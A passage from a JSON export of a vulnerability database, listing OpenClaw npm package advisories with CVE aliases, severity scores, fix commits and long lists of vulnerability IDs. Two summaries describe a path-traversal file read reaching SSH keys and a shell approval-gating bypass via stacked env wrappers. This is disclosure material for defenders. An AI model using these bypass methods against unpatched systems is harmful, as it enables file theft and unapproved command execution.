gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2"}],"aliases":["CVE-2026-22180","GHSA-3pxq-f3cp-jmxp"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8u6d-ekbs-afgd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91812?format=json","vulnerability_id":"VCID-8uzb-xmf8-hbca","summary":"OpenClaw is vulnerable to Path Traversal through path validation bypass\nOpenClaw through 2026.3.23 (fixed in commit 4797bbc) contains a path traversal vulnerability in media parsing that allows attackers to read arbitrary files by bypassing path validation in the isLikelyLocalPath() and isValidMedia() functions. Attackers can exploit incomplete validation and the allowBareFilename bypass to reference files outside the intended application sandbox, resulting in disclosure of sensitive information including system files, environment files, and SSH keys.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32846","reference_id":"","reference_type":"","scores":[{"value":"0.00027","scoring_system":"epss","scoring_elements":"0.08194","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00027","scoring_system":"epss","scoring_elements":"0.08191","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00027","scoring_system":"epss","scoring_elements":"0.08208","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32846"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/4797bbc5b96e2cca5532e43b58915c051746fe37","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-27T14:43:02Z/"}],"url":"https://github.com/openclaw/openclaw/commit/4797bbc5b96e2cca5532e43b58915c051746fe37"},{"reference_url":"https://github.com/openclaw/openclaw/pull/54642","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-27T14:43:02Z/"}],"url":"https://github.com/openclaw/openclaw/pull/54642"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f6pf-4gjx-c94r","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-27T14:43:02Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f6pf-4gjx-c94r"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32846","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32846"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-media-parsing-path-traversal-to-arbitrary-file-read","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-27T14:43:02Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-media-parsing-path-traversal-to-arbitrary-file-read"},{"reference_url":"https://github.com/advisories/GHSA-hggm-x7r9-mm7v","reference_id":"GHSA-hggm-x7r9-mm7v","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hggm-x7r9-mm7v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-32846","GHSA-hggm-x7r9-mm7v"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8uzb-xmf8-hbca"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50760?format=json","vulnerability_id":"VCID-8v2w-jgh7-6ybq","summary":"OpenClaw: system.run wrapper-depth boundary could skip shell approval gating\nOpenClaw's `system.run` dispatch-wrapper handling applied different depth-boundary rules to shell-wrapper approval detection and execution planning.\n\nWith exactly four transparent dispatch wrappers such as repeated `env` invocations before `/bin/sh -c`, the approval classifier could stop treating the command as a shell wrapper at the depth boundary while execution planning still unwrapped through to the shell payload. In `security=allowlist` mode, that mismatch could skip the expected approval-required path for the shell wrapper invocation.\n\nLatest published npm version: `2026.3.2`\n\nFixed on `main` on March 7, 2026 in `2fc95a7cfc1eb9306356510b0251b6d51fb1c0b0` by keeping shell-wrapper classification active at the configured dispatch depth boundary and only failing closed beyond that boundary. This aligns approval gating with the execution plan. Legitimate shallow dispatch-wrapper usage continues to work.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27183","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03735","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03746","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03743","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27183"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/2fc95a7cfc1eb9306356510b0251b6d51fb1c0b0","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T14:00:14Z/"}],"url":"https://github.com/openclaw/openclaw/commit/2fc95a7cfc1eb9306356510b0251b6d51fb1c0b0"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7"},{"reference_url":"https://vulncheck.com/advisories/openclaw-mar-shell-approval-gating-bypass-via-dispatch-wrapper-depth-mismatch","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T14:00:14Z/"}],"url":"https://vulncheck.com/advisories/openclaw-mar-shell-approval-gating-bypass-via-dispatch-wrapper-depth-mismatch"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27183","reference_id":"CVE-2026-27183","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27183"},{"reference_url":"https://github.com/advisories/GHSA-r6qf-8968-wj9q","reference_id":"GHSA-r6qf-8968-wj9q","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r6qf-8968-wj9q"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-r6qf-8968-wj9q","reference_id":"GHSA-r6qf-8968-wj9q","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T14:00:14Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-r6qf-8968-wj9q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74554?format=json","purl":"pkg:npm/openclaw@2026.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VC